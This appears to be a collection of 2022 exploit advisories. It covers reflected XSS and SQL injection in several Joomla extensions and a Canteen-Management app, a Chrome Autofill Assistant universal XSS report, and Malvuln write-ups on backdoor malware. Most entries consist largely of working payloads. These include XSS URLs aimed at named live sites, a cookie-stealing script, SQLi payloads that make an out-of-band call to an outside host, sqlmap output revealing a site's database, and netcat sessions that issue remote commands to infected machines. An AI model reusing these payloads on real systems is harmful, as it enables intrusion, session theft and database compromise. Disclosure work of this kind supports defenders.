<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : RAXO Group - raxo.org │<br />│ Software : Joomla RAXO All-mode PRO 2.01 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /search-results<br /><br />GET parameter 'search' is vulnerable to XSS<br /><br />https://www.target.com/search-results?search=hep3l%22onfocus%3d%22alert(1)%22autofocus%3d%22oakzt<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Canteen-Management1.0-2022 SQLi<br />## Author: nu11secur1ty<br />## Date: 10.04.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi<br /><br />## Description:<br />The username parameter from Canteen-Management1.0-2022 appears to be<br />vulnerable to SQL injection attacks.<br />The malicious user can attack remotely this system by using this<br />vulnerability to steal all information from the database of this<br />system.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=UvIiDwEB'+(select<br />load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''<br />OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=UvIiDwEB'+(select<br />load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''<br />AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND<br />'awEr'='awEr&password=h5F!l8j!Y6&login=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/vvz2lh)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at<br />https://packetstormsecurity.com/https://cve.mitre.org/index.html and<br />https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Solidres Team │<br />│ Software : Joomla Solidres 2.12.9 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />GET parameter 'prices' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/?option=com_solidres&task=hub.updateFilter&location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&prices=cqsw4%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22jlc4w&stars=4&<br /><br /><br />GET parameter 'location' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=a8s3m%22%3e%3cscript%3ealert(1)%3c%2fscript%3esnein&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br /><br />GET parameter 'room_quantity' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=h32cq%22%3e%3cscript%3ealert(1)%3c%2fscript%3etzlez&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br /><br />GET parameter 'room_opt[1][adults]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=qa0is%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekvqtk&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br /><br />GET parameter 'room_opt[1][children]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=xcpf7%22%3e%3cscript%3ealert(1)%3c%2fscript%3exhufo&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br /><br />GET parameter 'start' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=m85s0%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu48v0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br /><br />GET parameter 'Itemid' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations<br /><br />https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=t2ofl%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyf30r&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/de6220a8e8fcbbee9763fb10e0ca23d7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Delf.eg<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 7401. Third-party adversarys who can reach infected systems can issue commands made available by the backdoor. Call "exec" plus the program name, to launch the victims browser you add URL after exec and so forth.<br />Family: Delf<br />Type: PE32<br />MD5: de6220a8e8fcbbee9763fb10e0ca23d7<br />Vuln ID: MVID-2022-0647<br />Disclosure: 10/02/2022<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 7401<br />Warning<br />exec calc.exe<br />42<br />exec https://www.malvuln.com/DOOM.exe<br />42<br />QUIT<br />221 Merci d'avoir utilisΘ Under7 version 4.3, crΘe par Liquid Snake<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Les Arbres Design │<br />│ Software : Joomla Rentalot Plus 19.05 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /check-view<br /><br />GET parameter 'instance' is vulnerable to XSS<br /><br />https://demo.lesarbresdesign.info/check-view?option=com_rentalotplus&controller=check&task=ajax_get_availability&format=raw&tmpl=component&version=detailed&datefrom=&currency=undefined&instance=byhiw"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"onuph<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/273fd3f33279cc9c0378a49cf63d7a06.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.NTRC<br />Vulnerability: Weak Hardcoded Credentials<br />Family: NTRC<br />Type: PE32<br />MD5: 273fd3f33279cc9c0378a49cf63d7a06<br />Vuln ID: MVID-2022-0646<br />Disclosure: 10/02/2022<br />Description: The malware listens on TCP port 6767. Authentication is required, however the password "Please change me" is weak and hardcoded in cleartext at offset 0045E520. Commands get executed by sending the password delimited by a semicolon ";" E.g. Please change me;SystemInfo;. The command SendScreen dumps screenshot as .BMF file, to get the next part of the file issue SendScreenNextPart.<br /><br />0045E520 dd 16 ; Len<br />0045E520 db 'Please change me',0 ; Text<br />0045E539 align 4<br /><br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 6767<br />SendScreen<br />SendScreenNextPart<br />Stop<br /><br />Please change me;Shutdown;<br />Error;Can not shutdown the server. Please contact the author at borgo@bigfoot.com<br />Please change me;Logoff;<br /><br />Please change me;SystemInfo;<br />SystemInfo;6.2;9200;Windows NT;Victim;DESKTOP-2C3IQHO;C:\WINDOWS;1;Intel;Intel Pentium<br /><br />Please change me;SystemInfo2;<br />;;;;;0;0;0;0;0;;;;9 Mb;1480.29 Mb;27 %;2687.49 Mb;1607.21 Mb;40 %;2047.88 Mb;1893.88 Mb;D<br /><br />Please change me;Logoff;<br />FolderMonitorChanged<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: *XSS*<br /># Exploit Author: *VP4TR10T*<br /># Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/<br /><http://passwordmanager.adiscon.com/en/manual/><br />*# Software Link:*http://passwordmanager.adiscon.com/<br /><http://passwordmanager.adiscon.com/><br />*# Version: *Version 2.0<br />*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664<br /><br />*Affected URI (when trying to change user password):<br />POST /isapi/PasswordManager.dll HTTP/1.1<br /><br />HTTP Payload (Affected Parameter ):<br />ReturnURL=<script>alert(document.cookie)</script><br /><br />*Cordially,*<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Team MarvikShop │<br />│ Software : Joomla MarvikShop ShoppingCart 3.4 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /en/index.php<br /><br />GET parameter 'sortdir' is vulnerable to XSS<br /><br />https://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a onerror=alert(1)>vh217<br /><br />GET parameter 'limitstart' is vulnerable to XSS<br /><br />https://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a onerror=alert(1)>fe7s7<br /><br />GET parameter 'limit' is vulnerable to XSS<br /><br />https://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a onerror=alert(1)>tquly<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Team MarvikShop │<br />│ Software : Joomla MarvikShop ShoppingCart 3.4 │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /en/index.php<br /><br />GET parameter 'sortdir' is vulnerable<br /><br />---<br />Parameter: sortdir (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)<br /> Payload: option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,(SELECT (ELT(9096=9096,1))),0x7171626271))&limitstart=0&limit=25<br />---<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Nginx, PHP 7.1.33<br />back-end DBMS: MySQL >= 5.1 (MariaDB fork)<br />[INFO] fetching current database<br /><br />current database: 'stenen_test'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Chrome: Universal XSS in Autofill Assistant<br /><br />VULNERABILITY DETAILS<br />From the Autofill Assistant README file[1]:<br /><br />Autofill Assistant is an execution engine to run user journeys on websites given a set of actions. These actions include clicking on buttons or scrolling to an element. They also provide a way to interact with the user or get input to advance in the flow.<br /><br />This report describes a chain of issues in the implementation of the assistant that allows a malicious attacker to execute JavaScript code in the context of an arbitrary website.<br /><br />1. Launch Check Bypass<br /><br />There are several ways to launch a user journey i.e. to activate the assistant on a specific web page. From an attacker's point of view, the most interesting one is via Android intent:// URIs. To run the assistant, a web page simply needs to initiate navigation to a special URI. However, `ExternalNavigationHandler::handleWithAutofillAssistant()` is only meant to launch the journey if the navigation request comes from a web page in a subdomain of google.com i.e. a trusted source[2]. Unfortunately, if you look at the source code of `ExternalNavigationHandler::isGoogleReferrer()`[3], you'll notice that it actually only checks whether the main frame of the tab that's being navigated currently hosts a google.com page. This means the attacker can bypass the check by opening a google.com page first and then navigating it to the intent URI. This action doesn't violate the same-origin policy.<br /><br />```<br />w = open(\"https://google.com/\");<br />setTimeout(() => w.location = \"intent://...\", 1000);<br /><br />```<br /><br />Another way to bypass the check is by putting a regular https:// link somewhere on google.com to the attacker-controlled website and configuring the attacker's web server to reply with an HTTP redirect to the intent:// URI.<br /><br />It's not clear whether the intended (rather than actual) checks are still too coarse-grained. Can an intent link be hosted on a user-controlled page in a subdomain of google.com, for example, via Google Sites? Can a third-party Android app launch the intent directly?<br /><br />2. Parameter Manipulation<br /><br />Autofill Assistant intent URIs include the address of the target web page, as well as script parameters, which the attacker can arbitrarily modify. Some of the parameters, like `DISABLE_RPC_SIGNING`[4] or `PASSWORD_CHANGE_USERNAME`, seem to have security impact. Also, the `DETAILS_*` parameter group allows the attacker to show a partially-controlled native-looking user interface on top of websites that have associated user journeys.<br /><br />If, at the moment, only Google is allowed to create these URIs, could signature checking be added to prevent arbitrary manipulation of the script parameters?<br /><br />3. Trigger Script Injection<br /><br />The most promising parameter is called `TRIGGER_SCRIPTS_BASE64`. It lets the attacker overwrite the backend's trigger script response[5]. Trigger scripts are lightweight scripts that may launch the regular journey flow once a certain set of conditions is met on the page. In addition, they can show a basic provisional user interface.<br /><br />Since the trigger condition definition language is powerful enough, for example, to perform a regex match on a specific property of a specific page element, and certain trigger actions, like loading a picture from an external server, may be visible to the attacker, a custom trigger script may be used to exfiltrate data from a web page character by character.<br /><br />A trigger script response can be overridden for any website, not just the ones that are currently supported by Autofill Assistant. Also, a user is shown a consent dialog when they attempt to use the assistant for the first time, but trigger scripts are executed without any user interaction.<br /><br />4. JavaScript Injection Via Property Filter<br /><br />`JsFilterBuilder` translates trigger conditions defined by a script into JavaScript code, which is then executed in the context of the target web page. The builder properly encodes all of its inputs, using functions like `AddArgument`[6] and making sure it's impossible to corrupt the generated function and execute arbitrary code, with one unfortunate exception:<br /><br />```<br />message PropertyFilter {<br /> // The property to filter against.<br /> optional string property = 1;<br /><br /> oneof value {<br /> TextFilter text_filter = 2;<br /> AutofillValueRegexp autofill_value_regexp = 3;<br /> }<br />}<br /><br />```<br /><br />The code that translates `PropertyFilter` simply concatenates the property name parameter, skipping the encoding[7]:<br /><br />```<br />bool JsFilterBuilder::AddFilter(const SelectorProto::Filter& filter) {<br />[...]<br /> case SelectorProto::Filter::kProperty:<br /> AddRegexpFilter(filter.property().text_filter(),<br /> filter.property().property());<br />[...]<br />}<br /><br />void JsFilterBuilder::AddRegexpFilter(const TextFilter& filter,<br /> const std::string& property) {<br /> std::string re_var = AddRegexpInstance(filter);<br /> AddLine({\"elements = elements.filter((e) => \", re_var, \".test(e.\", property,<br /> \"));\"});<br />}<br /><br />```<br /><br />As a result, the attacker can run arbitrary JavaScript with a trigger script like the following:<br /><br />```<br />trigger_scripts {<br /> trigger_condition {<br /> selector {<br /> filters { css_selector: \"*\" }<br /> filters {<br /> property {<br /> property: \"a+alert(location)\"<br /> text_filter {<br /> re2: \"\"<br /> }<br /> }<br /> }<br /> }<br /> }<br />}<br /><br />```<br /><br />which gets translated into:<br /><br />```<br />elements = elements.filter((e) => v1.test(e.a + alert(location)));<br /><br />```<br /><br />[1] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/<br />[2] https://source.chromium.org/chromium/chromium/src/+/main:chrome/android/java/src/org/chromium/chrome/browser/externalnav/ExternalNavigationDelegateImpl.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=323<br />[3] https://source.chromium.org/chromium/chromium/src/+/main:components/external_intents/android/java/src/org/chromium/components/external_intents/ExternalNavigationHandler.java;drc=4c4e66a10a1895d8be8b8978f938eb698ff93492;l=2098<br />[4] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/script_parameters.cc;drc=4c5a895bed6c12687227f92c8d66dfb0bfb03225;l=111<br />[5] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/service.proto;drc=39e992a5452136dd9944c9c957245e3f88885e71;l=783<br />[6] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=197<br />[7] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=189<br /><br />VERSION<br />Google Chrome 103.0.5060.53 (Official Build)<br /><br />REPRODUCTION CASE<br />```<br /><body><br /><h1>Click me</h1><br /><script><br />NS = \".org.chromium.chrome.browser.autofill_assistant.\";<br />TARGET_URL = \"https://google.com/\";<br /><br />onclick = () => {<br /> w = open(\"https://google.com/\");<br /> setTimeout(() => {<br /> w.location = `intent://a/#Intent;<br /> scheme=http;<br /> S.browser_fallback_url=${escape(TARGET_URL)};<br /> B${NS}ENABLED=true;<br /> B${NS}START_IMMEDIATELY=false;<br /> S${NS}TRIGGER_SCRIPTS_BASE64=CiQKIkIgSgMSASpKGXIXChFhK2FsZXJ0KGxvY2F0aW9uKRICCgA=;<br /> end`.replace(/\\s/g, \"\");<br /> }, 1000);<br />}<br /></script><br /></body><br /><br />```<br /><br />CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-09-22.<br /><br />Please note that, according to our disclosure policy, if Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline. For more details, see https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.<br /><br /><br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>